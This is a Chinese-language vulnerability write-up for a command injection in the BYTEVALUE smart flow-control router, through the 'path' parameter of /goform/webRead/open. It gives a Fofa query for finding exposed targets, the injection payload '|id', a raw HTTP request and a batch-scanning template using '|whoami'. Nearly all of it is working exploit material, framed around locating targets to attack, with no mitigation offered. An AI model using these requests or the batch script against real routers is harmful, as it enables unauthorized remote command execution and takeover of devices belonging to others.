漏洞描述

BYTEVALUE 百为流控是一款追求完美上网体验、追求最大带宽利用率的多功能路由器,因其颠覆性的核心功能智能流控而名为百为流控路由器。在百为智能流控路由器/goform/webRead/open路由的 path 参数存在命令注入漏洞。攻击者可通过该漏洞在服务器端执行命令,获取服务器权限。

漏洞复现

步骤一:使用以下语句进行搜索并确定要攻击的目标...

# Fofa语法

BYTEVALUE 智能流控路由器

步骤二:拼接以下路径进行访问发现其路径中的id命令被执行即可说明存在漏洞

# 拼接路径

/goform/webRead/open/?path=|id

步骤三:以下为BP抓包后的数据包内容....

GET /goform/webRead/open/?path=|id HTTP/1.1
Host:IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

批量脚本


id: Bytevalue-Route

info:
  name: Bytevalue-Route
  author: Ph9ar
  severity: high
  description: description
  reference:
    - https://4pts.online
  tags: rce

requests:
  - raw:
      - |+
        GET /goform/webRead/open/?path=|whoami HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Connection: close
        Upgrade-Insecure-Requests: 1


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - admin
      - type: status
        status:
          - 200